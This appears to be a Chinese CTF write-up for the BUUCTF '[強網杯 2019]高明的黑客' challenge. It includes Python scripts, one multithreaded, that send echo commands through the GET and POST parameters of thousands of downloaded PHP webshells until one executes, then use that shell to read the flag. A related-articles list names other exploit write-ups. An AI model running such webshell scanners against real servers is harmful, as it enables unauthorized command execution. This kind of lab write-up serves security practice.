BUUCTF WEB [強網杯 2019]高明的黑客

原創 A_dmins 2020-06-29 16:46

BUUCTF WEB [強網杯 2019]高明的黑客

打開網頁,發現有提示~~源碼可下
在這裏插入圖片描述
下載源碼,發現3002個文件,查看一下,發現有不少的shell???
在這裏插入圖片描述
在這裏插入圖片描述
不過都是不能用的,其實這道題目就是讓我們找到能用的shell,考察的應該是腳本的編寫能力吧!!
源碼已經down下來了,在本地搭一個環境,php 7.0以上,否則會報語法錯誤!
然後編寫腳本(特別慢):

import requests
import sys
import os

url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)

def GetGet(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_GET['") > 0:
			start = i.find("$_GET['") + 7
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def GetPost(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_POST['") > 0:
			start = i.find("$_POST['") + 8
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def Send():
	for i in files:
		get = GetGet(i)
		print("Try filename: %s"%i)
		for j in get:
			NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
			s = requests.get(NewUrl)
			if("Success" in s.text):
				print("Success! Get:%s" % (j))
				break
		post = GetPost(i)
		for j in post:
			NewUrl = url+"%s"%(i)
			s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
			if("Success" in s.text):
				print("Success! Post:%s" % (j))
				break
		
Send()

這個腳本垃圾的一批,估計要跑一天,,,太菜了呀,直接放棄掉這個腳本了,,
可是好像也不會多線程啥的呀???哭了!!!搜了一下python3的多線程,改了一下:

import requests
import sys
import os
import threading
import time

url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)

def GetGet(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_GET['") > 0:
			start = i.find("$_GET['") + 7
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def GetPost(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_POST['") > 0:
			start = i.find("$_POST['") + 8
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def Send(start,end):
	start = int(start)
	end = int(end)
	for i in range(start,end):
		i = files[i]
		get = GetGet(i)
		print("Try filename: %s"%i)
		for j in get:
			NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
			s = requests.get(NewUrl)
			if("Success" in s.text):
				print("Success! Url:%s" % (NewUrl))
				break
		post = GetPost(i)
		for j in post:
			NewUrl = url+"%s"%(i)
			s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
			if("Success" in s.text):
				print("Success! Post:%s" % (j))
				break

class myThread (threading.Thread):
    def __init__(self, threadID, name, counter):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter
    def run(self):               
        Send(self.name, self.counter)

for i in range(0,150):
	thread = myThread(i,i*20,(i+1)*20)
	thread.start()

跑了大概20多分鐘吧,得到了:
在這裏插入圖片描述
直接去進行命令執行!!
在這裏插入圖片描述
最後得到了flag:
在這裏插入圖片描述
盡力了,只能將時間縮減到20多分鐘,,,
哪位大佬如果知道更快的方法麻煩指導一下,,,,,感激不盡!!!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

BUUCTF WEB [CISCN2019 華北賽區 Day2 Web1]Hack World

BUUCTF WEB [CISCN2019 華北賽區 Day2 Web1]Hack World 打開題目,看提示貌似是一個sql注入的題目~~ 進行簡單測試,貌似不是報錯注入,直接進行盲注測試,構造一波!! 抓包構造:id=1=(

A_dmins 2020-06-29 16:46:09

BUUCTF WEB [RoarCTF 2019]Easy Calc

BUUCTF WEB [RoarCTF 2019]Easy Calc 打開網頁是一個計算的!!隨便輸入可以計算,然後就沒啥了,右鍵源代碼: 存在waf,,還有個新的頁面!進行訪問,看到源代碼: <?php error_repo

A_dmins 2020-06-29 16:46:09

BUUCTF WEB(2020-2月刷題~)

BUUCTF WEB(2020-2月刷題~) 開學遙遙無期,不知道該幹些什麼,上一個月完全沒有碰過題目 也是時候做一做題目了,不然真的玩了一個寒假,,,,,, 畢竟知識點也是需要鞏固的,,,,總是覺得自己還是太菜,,也不知道該怎麼

A_dmins 2020-06-29 16:46:05

BJDCTF 2nd WEB

BJDCTF 2nd WEB emmm,比賽做了幾道題,賽後官方給了wp,把沒做出來的復現一下,,,, [BJDCTF 2nd]fake google 一個SSTI,發現是jinja2的,直接用payload打就行: {% for

A_dmins 2020-06-29 16:46:05

XCTF WEB upload(RCTF-2015)

XCTF WEB upload(RCTF-2015) 兩百多天未解決的問題了,,,, 打開題目,發現需要登錄註冊,,註冊登陸之後需要我們進行文件上傳: 估摸着登錄頁面與註冊頁面沒有漏洞,,,,,畢竟題目提示就是讓我們上傳,, 上

A_dmins 2020-06-29 16:46:09

i春秋試驗場 CTF奪旗賽(第三季)RE 整型數列

i春秋試驗場 CTF奪旗賽(第三季)RE 整型數列 emmmm,這次比賽比較簡單,沒啥好說的,,, 關鍵記錄一下這個逆向題目,,,,, ida直接打開進行靜態分析: 看英語好像是說可以自動跑出來,需要一些時間,,,, 直接上ka

A_dmins 2020-06-29 16:46:09

I-SOON CTF

I-SOON CTF 各種CTF遍地開花,,,,雖然一天滿課,但是做題還是要做的!!!只能做這麼幾道了,,菜~ MISC - 吹着貝斯掃二維碼 下載文件發現一堆文件,發現都是jpg文件,而且每個文件後都有個序號,進行修正: 進行

A_dmins 2020-06-29 16:46:09

i春秋試驗場 CTF答題奪旗賽(第四季)

i春秋試驗場 CTF答題奪旗賽(第四季) web nani 進入查看源碼可以看見: 添加參數file,提示一個user.php,發現存在文件包含,直接進行文件讀取,得到user.php的源碼: <?php class conve

A_dmins 2020-06-29 16:46:09

ciscn_2019_s_1

思路 通過off by null寫key值然後unlink寫bss段再次double free寫free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1')

doudoudedi 2020-06-30 21:46:59

CTF題記——再戰GK、BUU

前言 沒事做一些雜項和密碼學的題,記下沒見過的,總結思路。擴大腦洞。 本文目錄前言Crypto🍖[GKCTF2020]漢字的祕密[MRCTF2020]古典密碼知多少[MRCTF2020]keyboard[WUSTCTF2020]佛

m0re 2020-06-29 07:37:14

suctf2018_heap

suctf2018_heap 這道題會一次性申請2個相同大小的chunk做的時候有點邏輯混亂深深的懷疑本來是ubuntu16的環境… 思路 : off by one打成堆重疊寫到指針段寫atoi爲system拿shell exp:

doudoudedi 2020-06-28 23:41:06

others_easyheap

思路 堆溢出構造堆塊重疊打free_hook爲system exp: from pwn import * #p=process('./easyheap') elf=ELF('./easyheap') libc=elf.libc p

doudoudedi 2020-06-28 23:41:05

BUUCTF zctf_2016_note3

一道典型的unlink題目整形溢出因爲i是無符號長整型如果輸入-1就會變得巨大實現堆溢出這裏應該可以用unlink泄露libc基址然後用fastbin attack打malloc_hook但是這裏有多次寫入的edit功能就很好做了

doudoudedi 2020-06-28 23:41:05

BUUCTF ciscn_2019_ne_5

這道題是一道典型的ROP一開始沒找到參數~~ 直接溢出emem exp(其實我寫的很麻煩了很簡單的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=pro

doudoudedi 2020-06-28 23:41:05

noxctf2018_grocery_list&&actf_2019_message

noxctf2018_grocery_list 先是觀察函數發現有一個可以泄露棧地址然後通過tcache attack打到棧上泄露libcbase然後再次寫入free_hook拿到shell exp: #!/usr/bin/pyt

doudoudedi 2020-06-28 23:41:05